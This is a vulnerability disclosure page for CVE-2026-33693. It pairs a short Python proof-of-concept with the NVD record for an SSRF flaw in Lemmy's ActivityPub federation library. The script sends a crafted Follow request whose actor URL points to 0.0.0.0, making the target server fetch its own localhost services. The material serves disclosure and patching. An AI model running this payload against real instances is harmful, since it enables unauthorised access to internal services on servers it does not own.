CVE-2026-33693

# PoC for CVE-2026-33693: SSRF via 0.0.0.0 in Lemmy # This script simulates sending a malicious ActivityPub object pointing to 0.0.0.0 import requests import json # The target Lemmy instance inbox URL target_inbox = "https://<target-lemmy-instance>/inbox" # Malicious actor URL pointing to 0.0.0.0 (Localhost) malicious_actor = "http://0.0.0.0:8080/actor" # Construct a basic ActivityPub Follow request payload = { "@context": "https://www.w3.org/ns/activitystreams", "type": "Follow", "actor": malicious_actor, "object": "https://<target-lemmy-instance>/u/admin" } headers = { "Content-Type": "application/ld+json; profile="https://www.w3.org/ns/activitystreams"" } print(f"Sending payload to {target_inbox}...") print(f"Payload: {json.dumps(payload, indent=2)}") try: # The server will attempt to fetch the 'actor' URL to verify it. # Due to the bug, it does not block 0.0.0.0, leading to an SSRF condition. response = requests.post(target_inbox, json=payload, headers=headers, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") except Exception as e: print(f"Request failed: {e}")

{"cve": {"id": "CVE-2026-33693", "sourceIdentifier": "[email protected]", "published": "2026-03-27T01:16:18.983", "lastModified": "2026-04-28T21:14:50.743", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.7.0-beta.9, the `v4_is_invalid()` function in `activitypub-federation-rust` (`src/utils.rs`) does not check for `Ipv4Addr::UNSPECIFIED` (0.0.0.0). An unauthenticated attacker controlling a remote domain can point it to 0.0.0.0, bypass the SSRF protection introduced by the fix for CVE-2025-25194 (GHSA-7723-35v7-qcxw), and reach localhost services on the target server. Version 0.7.0-beta.9 patches the issue."}, {"lang": "es", "value": "Lemmy es un agregador de enlaces y un foro para el fediverso. Antes de la versión 0.7.0-beta.9, la función `v4_is_invalid()` de `activitypub-federation-rust` (`src/utils.rs`) no comprueba si existe `Ipv4Addr::UNSPECIFIED` (0.0.0.0). Un atacante no autenticado que controle un dominio remoto puede apuntarlo a 0.0.0.0, eludir la protección SSRF introducida por la corrección para CVE-2025-25194 (GHSA-7723-35v7-qcxw) y acceder a los servicios de localhost en el servidor de destino. La versión 0.7.0-beta.9 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/LemmyNet/activitypub-federation-rust/commit/4ae8532b17bc35755240b7f55d4a5b7665351599", "source": "[email protected]"}, {"url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-q537-8fr5-cw35", "source": "[email protected]"}, {"url": "https://github.com/advisories/GHSA-7723-35v7-qcxw", "source": "[email protected]"}]}}